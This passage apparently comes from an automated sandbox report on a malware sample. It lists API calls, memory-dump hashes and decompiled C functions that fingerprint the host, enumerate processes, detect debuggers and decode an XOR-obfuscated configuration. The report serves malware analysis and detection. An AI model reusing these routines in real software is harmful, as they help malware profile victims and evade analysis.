NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 011D2D7C

Part of subcall function 011D6837: RtlAllocateHeap.NTDLL(00000000,00000000,011D4197), ref: 011D6843

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 011D2D99
memcpy.NTDLL(00000000,00000000,0000001C), ref: 011D2DA6
NtClose.NTDLL(00000000), ref: 011D2DB8
NtClose.NTDLL(00000000), ref: 011D2DC2

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: b58d4255e13a1445c1cc12d0f09a6722207e966839ea1f8121ce532f29aef9bb
Instruction ID: f31b85a7d75291eb3550ec7cef04389359ae256d84496ceeabbbb2ffc2e5167f
Opcode Fuzzy Hash: b58d4255e13a1445c1cc12d0f09a6722207e966839ea1f8121ce532f29aef9bb
Instruction Fuzzy Hash: 222105B290122DBBDB11AFA4CC85DDEBFBDEF08754F104066FA04E6154D7718A40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 011D4454, Relevance: 9.1, APIs: 6, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E011D4454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x11da2c8; // 0x0
					_v12 = _t59;
				}
				_t64 = _t69;
				E011D143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x11da2d0 ^ 0x4c0ca0ae;
				} else {
					 *0x11da0e4(0,  &_v8);
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x11da290, 0, _t50 + _t50);
						if(_t62 != 0) {
							_push( &_v8);
							_push(_t62);
							if( *0x11da0e4() != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E011D283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x11da290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x11da290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E011D283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x11da290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x011d4454
0x011d445c
0x011d4462
0x011d4465
0x011d4468
0x011d446a
0x011d446f
0x011d446f
0x011d4475
0x011d4477
0x011d4484
0x011d44e5
0x011d4486
0x011d448b
0x011d4491
0x011d4496
0x011d44a4
0x011d44a8
0x011d44ad
0x011d44ae
0x011d44b7
0x011d44be
0x011d44c5
0x011d44c5
0x011d44d0
0x011d44d0
0x011d44a8
0x011d4496
0x011d44e7
0x011d44ed
0x011d44f7
0x011d44f9
0x011d44fe
0x011d450d
0x011d4511
0x011d451c
0x011d4523
0x011d452a
0x011d452a
0x011d4536
0x011d4536
0x011d4511
0x011d453f
0x011d4541
0x011d4544
0x011d4546
0x011d4549
0x011d454c
0x011d4556
0x011d455a
0x011d455e

APIs

RtlAllocateHeap.NTDLL(00000000,011D55CE), ref: 011D44A2
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,011D55CE,?,?,?,?,?,011D6BD8,?,00000001), ref: 011D44D0
GetComputerNameW.KERNEL32(00000000,00000000), ref: 011D44F7
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 011D450B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 011D4518
HeapFree.KERNEL32(00000000,00000000), ref: 011D4536

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$AllocateComputerFreeName
String ID:
API String ID: 3439771632-0
Opcode ID: 6c12916c9a14567e7bb994c816cbf5797a879b3e2e7db42ae08645cc60624be5
Instruction ID: d5183ecbf1efe8584fc9e4c16fef7405574d58d051130103d9c21bbfd1a0c734
Opcode Fuzzy Hash: 6c12916c9a14567e7bb994c816cbf5797a879b3e2e7db42ae08645cc60624be5
Instruction Fuzzy Hash: E4315C72A02209EFDB29DFA9EC80A6EBBF9FF44304F504079E655D3A10D731DA409B10

Uniqueness

Uniqueness Score: -1.00%

Function 0111B8F0, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 011251CB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 011251E2
UnhandledExceptionFilter.KERNEL32(0114CAC0), ref: 011251ED
GetCurrentProcess.KERNEL32(C0000409), ref: 0112520B
TerminateProcess.KERNEL32(00000000), ref: 01125212

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 095445af71e5eba69363ca5d5b2553f6e057d7f79c91b1f9ad961f79e31b5b3f
Instruction ID: c88d2ccb4a9f12216797627c5a0280379970c7c9e9234284f5db047cb97c0e0c
Opcode Fuzzy Hash: 095445af71e5eba69363ca5d5b2553f6e057d7f79c91b1f9ad961f79e31b5b3f
Instruction Fuzzy Hash: F121EDB8945704CFC768DF29E4846887BB0BB08705F40813EE83983269E37296D5CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 011D513E, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E011D513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x11da2d4; // 0x0
						_t2 = _t9 + 0x11dbdd4; // 0x3207eb62
						_push( &_v264);
						if( *0x11da118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x011d5149
0x011d5153
0x011d5157
0x011d5161
0x011d5192
0x011d5168
0x011d516d
0x011d517a
0x011d5183
0x011d519a
0x011d5185
0x011d518d
0x00000000
0x011d518d
0x011d519b
0x011d519c
0x00000000
0x011d519c
0x00000000
0x011d5196
0x011d51a2
0x011d51a7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011D514E
Process32First.KERNEL32(00000000,?), ref: 011D5161
Process32Next.KERNEL32(00000000,?), ref: 011D518D
CloseHandle.KERNEL32(00000000), ref: 011D519C

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: e7143443aa19d5d58074f9511455a86f9108370335dcc8e45c51a2fa21430d95
Instruction ID: cd1cd6e87111c7caa77ef05d969efba2f8ec1cbefccd4f2a2d6448e89a126f56
Opcode Fuzzy Hash: e7143443aa19d5d58074f9511455a86f9108370335dcc8e45c51a2fa21430d95
Instruction Fuzzy Hash: 7EF0BB3220212566DB69E67A9C48DDB77BDDFC5614F010161E965C3000EB3499868BA1

Uniqueness

Uniqueness Score: -1.00%

Function 010E1F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010E1F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x10e41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x10e41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x10e41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x10e41a8 = _t5;
					 *0x10e41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x10e41a4 = _t6;
					if(_t6 == 0) {
						 *0x10e41a4 =  *0x10e41a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x010e1f11
0x010e1f1f
0x010e1f27
0x010e1f2c
0x010e1f76
0x010e1f76
0x010e1f2e
0x010e1f36
0x010e1f72
0x010e1f74
0x010e1f38
0x010e1f38
0x010e1f3d
0x010e1f4b
0x010e1f50
0x010e1f56
0x010e1f5e
0x010e1f63
0x010e1f65
0x010e1f65
0x010e1f6f
0x010e1f6f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,010E1C8E,74B063F0,00000000), ref: 010E1F1F
GetVersion.KERNEL32 ref: 010E1F2E
GetCurrentProcessId.KERNEL32 ref: 010E1F3D
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 010E1F56

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 12def3db2b3ddc401840c4fa6b62b207965ecce7324ffbfde78d74ebbffe10f2
Instruction ID: 022700f032326f89ad803b7b9cf0486f75ca9fa6d0e1e5d414ade55b5e506f5e
Opcode Fuzzy Hash: 12def3db2b3ddc401840c4fa6b62b207965ecce7324ffbfde78d74ebbffe10f2
Instruction Fuzzy Hash: 54F0F471695210AEEBB09B6BB8197953FE4B714F11F14009AF2D5CE1C8D3BA85419B84

Uniqueness

Uniqueness Score: -1.00%

Function 011D2206, Relevance: 2.7, APIs: 2, Instructions: 204
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E011D2206(char* __ecx) {
				char _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				signed int _t56;
				int _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr* _t101;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x11da2d0; // 0x0
				if(E011D1BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x11da324 = _v8;
				}
				_t31 =  *0x11da2d0; // 0x0
				if(E011D1BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x11da2d0; // 0x0
				if(E011D1BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x11da290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x11da2d0; // 0x0
						_t43 = E011D38CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					_t101 =  *0x11da12c; // 0x11d78c3
					if(_t43 != 0) {
						_t87 =  &_v8;
						_push( &_v8);
						_push(0);
						_push(_t43);
						if( *_t101() != 0) {
							 *0x11da298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x11da2d0; // 0x0
						_t44 = E011D38CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						_push( &_v8);
						_push(0);
						_push(_t44);
						if( *_t101() != 0) {
							 *0x11da29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x11da2d0; // 0x0
						_t45 = E011D38CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						_push( &_v8);
						_push(0);
						_push(_t45);
						if( *_t101() != 0) {
							 *0x11da2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x11da2d0; // 0x0
						_t46 = E011D38CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						_push( &_v8);
						_push(0);
						_push(_t46);
						if( *_t101() != 0) {
							 *0x11da004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x11da2d0; // 0x0
						_t47 = E011D38CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						_push( &_v8);
						_push(0);
						_push(_t47);
						if( *_t101() != 0) {
							 *0x11da02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x11da2d0; // 0x0
						_t48 = E011D38CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E011D3E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E011D50DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x11da2d0; // 0x0
						_t49 = E011D38CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E011D3E49(0, _t49) != 0) {
						_t102 =  *0x11da37c; // 0x0
						E011D10DD(_t102 + 4, _t54);
					}
					_t50 =  *0x11da2d4; // 0x0
					_t20 = _t50 + 0x11db252; // 0x11db252
					_t21 = _t50 + 0x11db7b5; // 0x9c0f7254
					 *0x11da320 = _t20;
					 *0x11da390 = _t21;
					HeapFree( *0x11da290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}

0x011d2206
0x011d2209
0x011d2229
0x011d2237
0x011d2237
0x011d223c
0x011d2256
0x011d242a
0x011d2431
0x011d2438
0x011d2438
0x011d225c
0x011d2278
0x011d2418
0x011d2422
0x00000000
0x011d227e
0x011d227e
0x011d2283
0x011d2299
0x011d2285
0x011d2285
0x011d2292
0x011d2292
0x011d229d
0x011d22a3
0x011d22a5
0x011d22a8
0x011d22a9
0x011d22aa
0x011d22af
0x011d22b4
0x011d22b4
0x011d22af
0x011d22bb
0x011d22d1
0x011d22bd
0x011d22bd
0x011d22ca
0x011d22ca
0x011d22d5
0x011d22d7
0x011d22da
0x011d22db
0x011d22dc
0x011d22e1
0x011d22e6
0x011d22e6
0x011d22e1
0x011d22ed
0x011d2303
0x011d22ef
0x011d22ef
0x011d22fc
0x011d22fc
0x011d2307
0x011d2309
0x011d230c
0x011d230d
0x011d230e
0x011d2313
0x011d2318
0x011d2318
0x011d2313
0x011d231f
0x011d2335
0x011d2321
0x011d2321
0x011d232e
0x011d232e
0x011d2339
0x011d233b
0x011d233e
0x011d233f
0x011d2340
0x011d2345
0x011d234a
0x011d234a
0x011d2345
0x011d2351
0x011d2367
0x011d2353
0x011d2353
0x011d2360
0x011d2360
0x011d236b
0x011d236d
0x011d2370
0x011d2371
0x011d2372
0x011d2377
0x011d237c
0x011d237c
0x011d2377
0x011d2383
0x011d2399
0x011d2385
0x011d2385
0x011d2392
0x011d2392
0x011d239d
0x011d239f
0x011d23a2
0x011d23a3
0x011d23aa
0x011d23ac
0x011d23ad
0x011d23ad
0x011d23aa
0x011d23b4
0x011d23ca
0x011d23b6
0x011d23b6
0x011d23c3
0x011d23c3
0x011d23ce
0x011d23dc
0x011d23e6
0x011d23e6
0x011d23eb
0x011d23f1
0x011d23fe
0x011d2404
0x011d240a
0x011d240f
0x011d2415
0x00000000
0x011d2415

APIs

HeapFree.KERNEL32(00000000,?,?,011D55D3,00000000,?,?,00000000,011D55D3,?,00000000,E8FA7DD7,011DA00C,011D7909), ref: 011D240F
HeapFree.KERNEL32(00000000,?,?,011D55D3,00000000,?,?,00000000,011D55D3,?,00000000,E8FA7DD7,011DA00C,011D7909), ref: 011D2422

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 128619a79be59f0f7d9dfe4de78a086906c770d8728521112c5a005ab35d51e4
Instruction ID: 61c92380a8859bc7f3ae10c185d9f87045528063488731851aaf86b54c873ad2
Opcode Fuzzy Hash: 128619a79be59f0f7d9dfe4de78a086906c770d8728521112c5a005ab35d51e4
Instruction Fuzzy Hash: 1F618771A1A115BBDB2DDBBDDC88C5F7BFDAF4C640B240925B522D3144EB31D9808B61

Uniqueness

Uniqueness Score: -1.00%

Function 011D3109, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E011D3109(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
